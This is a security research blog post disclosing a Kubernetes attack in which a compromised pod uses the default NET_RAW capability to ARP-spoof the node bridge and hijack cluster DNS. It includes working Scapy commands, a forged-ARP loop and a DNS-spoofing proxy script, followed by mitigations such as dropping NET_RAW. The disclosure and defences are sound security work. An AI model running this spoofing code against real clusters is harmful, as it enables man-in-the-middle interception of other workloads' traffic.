In this post I’ll describe how an attacker who manages to run malicious code on a cluster can, with no special permissions, successfully spoof DNS responses to all the applications running on the cluster, and from there execute a MITM (Man In The Middle) attack on the network traffic of all pods.
Before we get into the attack scenario, let’s understand how Kubernetes intra-node networking works.
We could discuss Kubernetes networking in a whole series of blogs and still not cover everything, so in the following explanation I’m mostly going to concentrate on the default configuration, just to set common ground.
Kubernetes Networking in a Nutshell
Generally speaking, pod-to-pod networking inside the node is available via a bridge that connects all pods. This bridge is called “cbr0”.(1) (Some network plugins will install their own bridge, and give it a different name, but in this blog, we’ll refer to it as “cbr0”.) The cbr0 can also handle ARP (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.
In essence, this is how pods communicate with each other on the same node. It’s also how Docker works, and is the default for Kubernetes.
Adding DNS to the Equation
As you can see in the diagram, there’s a pod named CoreDNS (2) running on the node next to our application pod (3). It acts as the cluster’s DNS server. (In reality, there can be multiple cluster DNS server pods.)
This means that every DNS request in the cluster will arrive at the CoreDNS pod. The pod will first try to resolve the request from what it knows about the cluster: if the domain matches a service, pod, etc., it will return the corresponding local cluster IP. If not, the CoreDNS pod will reach out to the “upstream resolver”.
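For reference, a default CoreDNS configuration (the Corefile) looks roughly like the trimmed sketch below (the exact contents vary by distribution): the kubernetes plugin answers cluster-local names, and everything else is forwarded to the node’s upstream resolvers.

.:53 {
    kubernetes cluster.local in-addr.arpa ip6.arpa {
        pods insecure
        fallthrough in-addr.arpa ip6.arpa
    }
    forward . /etc/resolv.conf
    cache 30
}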
Taken from: kubelet/network/dns/dns.go::GetPodDNS()
// For a pod with DNSClusterFirst policy, the cluster DNS server is
// the only nameserver configured for the pod. The cluster DNS server
// itself will forward queries to other nameservers that is configured
// to use, in case the cluster DNS server cannot resolve the DNS query
// itself.
This is due to how Kubernetes handles cluster-local domain names.
The ClusterFirst DNS policy is the default for pods; it is rare to use a different policy.
Important note: Your application pod can be scheduled on the same node as the CoreDNS/kube-dns pod.
But how does a pod know the IP of the cluster DNS server?
Let’s create a pod in the cluster and look at how it resolves domain names.
By looking at the value of `hosts` in `/etc/nsswitch.conf`, we can figure out the expected behavior when resolving a name:
hosts: files dns
The pod will first try to resolve the address from the local hosts file, and only then from its configured DNS nameserver.
So let’s look at /etc/resolv.conf to find this nameserver:
nameserver 10.96.0.10
search default.svc.cluster.local svc.cluster.local cluster.local project.internal
options ndots:5
We see that the IP of the cluster DNS server is 10.96.0.10.
What gets assigned as the cluster DNS server inside pods (the nameserver) is actually the Service IP of the kube-dns service. Kubernetes uses something called a VIP (Virtual IP), whereby iptables rules apply DNAT (Destination Network Address Translation) to outgoing traffic destined for services, changing the destination VIP to the IP of a corresponding CoreDNS pod. Setting those iptables rules is the job of the kube-proxy pod that is deployed on each node.
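To illustrate, the NAT rules kube-proxy installs (in the default iptables mode) look roughly like the following sketch; the chain suffixes and the CoreDNS pod IP are placeholders, not taken from a real cluster:

-A PREROUTING -j KUBE-SERVICES
-A KUBE-SERVICES -d 10.96.0.10/32 -p udp --dport 53 -j KUBE-SVC-XXXXXXXXXXXXXXXX
-A KUBE-SVC-XXXXXXXXXXXXXXXX -j KUBE-SEP-YYYYYYYYYYYYYYYY
-A KUBE-SEP-YYYYYYYYYYYYYYYY -p udp -j DNAT --to-destination <coredns-pod-ip>:53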
Taking Over the Cluster DNS Server
Let’s imagine that our web application pod from earlier in the post got infected with malicious code.
Assuming the attacker does not have access to cloud metadata APIs, that the cluster is configured with secure RBAC rules, and that the pod is not mounted to a directory within `/var/log`, the attacker would not be able to “escape” the pod and perform a cluster-wide attack, remaining limited to a local attack on the pod, right?
Or would he?
Network Attacks
When looking at the capabilities granted to pods running with default configurations, we notice something disturbing.
root@pod:/# pscap -a
ppid pid name command capabilities
0 1 root bash chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
It seems that we have the NET_RAW capability.
(From the Linux capabilities(7) man page: CAP_NET_RAW allows the use of RAW and PACKET sockets, and binding to any address for transparent proxying.)
NET_RAW is granted to pods by default in Kubernetes. It’s there to allow ICMP traffic between containers. But in addition to ICMP traffic, this capability grants an application the ability to craft raw packets (like ARP and DNS), so there’s a lot of freedom for an attacker to play with network-related attacks.
ARP Spoofing
A very popular attack is ARP (Address Resolution Protocol) spoofing. This type of attack exploits the mechanism of correlating IP addresses with MAC (physical) addresses, to let you fake your identity and say: “Hi, I own this IP address, please forward all packets to me”.
Very cool.
Recall that cbr0 (1) (from the first diagram) uses ARP to correlate the IP addresses of pods with their corresponding network interfaces. Furthermore, the destination VIP of the DNS request is outside of the pod’s subnet, so the packet is sent to the pod’s default gateway (cbr0) while getting DNAT’ed. This makes cbr0 responsible for resolving the MAC address for the DNS request.
ARP spoofing the cbr0 bridge
All DNS requests arrive at the cbr0 bridge behind the CoreDNS pod (after they get DNAT’ed), where they are redirected to the DNS server pod.
Note that DNS requests coming from pods on other nodes will also arrive at this cbr0, since it is the bridge that connects the DNS pod to the cluster’s network.
So in the event an attacker manages to infect an application running next to a DNS pod, he could ARP spoof the cbr0, fooling it into thinking that he is the cluster DNS server, and take complete control of all DNS resolution in the cluster.
The Exploit and Proof of Concept
The exploit is written in Scapy. (Scapy is a packet-crafting framework for Python.)
To set up the environment, deploy two pods: an attacker pod and a victim pod.
After creating the two pods (for example with kubectl, using the manifests from the PoC repo linked below), we see:
pod/hacker created
pod/victim created
Then exec into Scapy’s interpreter in the attacker pod:
➜ ~ kubectl exec -it hacker scapy
First, we need to get the IP of the real kube-dns pod, bypassing the VIP to find the real IP of the pod behind the service.
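The kubedns_vip used below is the nameserver IP we read from /etc/resolv.conf earlier; if it isn’t defined yet, set it first (a sketch):

>>> kubedns_vip = "10.96.0.10"  # the kube-dns Service IP from the pod's resolv.conf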
>>> dns_pod_mac = srp1(Ether() / IP(dst=kubedns_vip) / UDP(dport=53) / DNS(rd=1,qd=DNSQR())).src
After sending a DNS request to the service IP, simulating a normal DNS resolution scenario, we take the source MAC address of the response. In theory, we could just take the source IP of the response; however, Kubernetes makes sure that we don’t discover the real IP by using SNAT (Source Network Address Translation) on outgoing traffic from the pod. That makes sense, because a resolver client like nslookup will not accept an answer whose source differs from the address it contacted.
We can now query everyone in the subnet for their MAC address and compare it with the source MAC address we received earlier. Alternatively, we can use RARP (Reverse Address Resolution Protocol) for this. But using normal ARP queries is more reasonable for most environments.
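A minimal sketch of that scan in Scapy (the pod CIDR below is a placeholder; adjust it to your cluster’s pod subnet):

>>> ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst="10.67.16.0/24"), timeout=3)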
>>> dns_pod_ip = [a[1][ARP].psrc for a in ans if a[1].src == dns_pod_mac][0]
We now need the MAC address and IP of the cbr0 bridge. We can get that with scapy by trace-routing (pinging an external IP and setting the IP ttl to 1):
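A minimal sketch of that step (the external IP is arbitrary; any address outside the pod subnet will do):

>>> res = srp1(Ether() / IP(dst="1.1.1.1", ttl=1) / ICMP())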
>>> cbr0_mac, cbr0_ip = res[Ether].src, res[IP].src
We now send fake ARP replies to the bridge (cbr0), telling it that we own the IP of the DNS Pod:
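A minimal sketch of the spoof itself (our own MAC is used as the ARP source by default, which is exactly what we want the bridge to learn):

>>> sendp(Ether(dst=cbr0_mac) / ARP(op="is-at", psrc=dns_pod_ip, pdst=cbr0_ip, hwdst=cbr0_mac), loop=1, inter=1)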
Note: By setting hwdst to the MAC of the bridge, we make sure to only spoof the bridge. This is a crucial measure, as we want to draw as little attention to ourselves as possible.
At this stage, we expect our attack to DoS (Denial of Service) the DNS resolution process, so, for example, nslookup from another pod in the cluster should not work.
While the attack is running, let’s exec into the victim pod.
➜ ~ kubectl exec -it victim zsh
We can then try to resolve a domain:
➜ victim / nslookup example.com
;; reply from unexpected source: 10.67.16.3#53, expected 10.67.0.10#53
;; reply from unexpected source: 10.67.16.3#53, expected 10.67.0.10#53
;; reply from unexpected source: 10.67.16.3#53, expected 10.67.0.10#53
;; connection timed out; no servers could be reached
It is beyond the scope of this blog to explain the errors we get from nslookup, but essentially they have to do with the fact that ip_forwarding is enabled by default inside containers as well (it is derived from the host). All we need to do now is run a DNS proxy server inside our malicious pod that forwards all traffic to the real CoreDNS pod, except for the specific domains we want to spoof. Thanks to how DNS works, the resolver client will accept our answer even if a different, suspicious answer was received first.
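To make the idea concrete, here is a minimal sketch of such a proxy (this is not the actual PoC code; the DNS pod IP, the spoofed domain and its target address are placeholders):

# dns_proxy_sketch.py - after the ARP spoof, DNS queries meant for the CoreDNS pod
# reach our interface: sniff them, spoof the domains we care about, proxy the rest.
import socket
from scapy.all import sniff, send, IP, UDP, DNS, DNSQR, DNSRR

DNS_POD_IP = "10.67.16.2"                  # placeholder: the dns_pod_ip we discovered
SPOOFED = {b"example.com.": "10.67.16.5"}  # placeholder: domain -> attacker-controlled IP

def handle(pkt):
    if not (pkt.haslayer(DNS) and pkt[DNS].qr == 0):   # only handle queries
        return
    query = pkt[DNS]
    qname = query[DNSQR].qname
    if qname in SPOOFED:
        # craft a spoofed answer for the hijacked domain
        answer = DNS(id=query.id, qr=1, aa=1, qd=query.qd,
                     an=DNSRR(rrname=qname, ttl=60, rdata=SPOOFED[qname]))
    else:
        # ask the real CoreDNS pod and relay its answer
        upstream = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        upstream.sendto(bytes(query), (DNS_POD_IP, 53))
        answer = DNS(upstream.recvfrom(4096)[0])
        upstream.close()
    # reply to the client pod (the real PoC takes more care that the reply
    # appears to come from the source the resolver expects)
    send(IP(dst=pkt[IP].src) / UDP(sport=53, dport=pkt[UDP].sport) / answer, verbose=0)

# sniff the queries that the ARP spoof redirected to us
sniff(filter="udp dst port 53 and dst host %s" % DNS_POD_IP, prn=handle)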
The POC
I’ve prepared a full PoC for this exploit; it does the following:
- Automatically discovers all IP/MAC addresses it needs
- Decides whether it can run the attack
- Runs an ARP spoof on the cbr0 bridge
- Serves a DNS proxy, which connects to the real kube-dns pod and forwards all requests to it.
- Reads a custom hosts file, and answers with a spoofed DNS response when there’s a match.
The following video shows how an attacker could impersonate a web server and send malicious data by spoofing a domain name.
All the files for this exploit can be found in this GitHub repo.
Keep this in mind:
- If CoreDNS spins up more than one DNS pod, the results are unstable if you only spoof one.
- This exploit only works if you run on the same node as the DNS pod, although similar operations could be performed to overcome this.
How Can I Protect Myself?
We published new hunters for kube-hunter, our open source pen-testing tool for Kubernetes, which will tell you if you are vulnerable to this exploit. To find out if you are vulnerable, run kube-hunter as a pod with the `--active` flag. If you get a “Possible ARP Spoof” or “Possible DNS Spoof” finding, you need to perform the suggested mitigation steps.
Typically, using an L3 network plugin, which routes traffic between pods on the same node at Layer 3 instead of bridging them at Layer 2, could prevent this exploit.
We also raised this issue with the Kubernetes project’s security team, and they stated that: “It is unfortunate that the Kubernetes & Docker container default is to allow CAP_NET_RAW, but to maintain backwards compatibility we don’t think we can change this default in the short term. Users should drop unneeded capabilities for their applications through the container SecurityContext or with Pod Security Policies”.
They further expanded that: “Some CNI plugins will prevent ARP spoofing because they will reject any traffic from the pod where the source MAC or source IP address doesn’t match. For example, the OpenShift SDN CNI plugin and the future ovn-kubernetes plugin (in development) send traffic through an OVS bridge which drops traffic not from the configured source addresses for the interface. With those plugins, as long as a pod is not using hostNetwork: true, pods won’t be able to do ARP spoofing”.
Mitigation
The recommended step to avoid such network attacks is adding a `securityContext` that drops the NET_RAW capability from your application.
For example:
apiVersion: v1
kind: Pod
metadata:
  name: my-app
spec:
  containers:
  - name: my-app
    image: my-app-image
    securityContext:
      capabilities:
        drop:
        - NET_RAW
This shouldn’t affect most applications, since NET_RAW is only needed by applications that do deep network inspection or manipulation. Dropping this capability will make sure that even if your application code is compromised, the attacker cannot perform such network-based attacks on your cluster.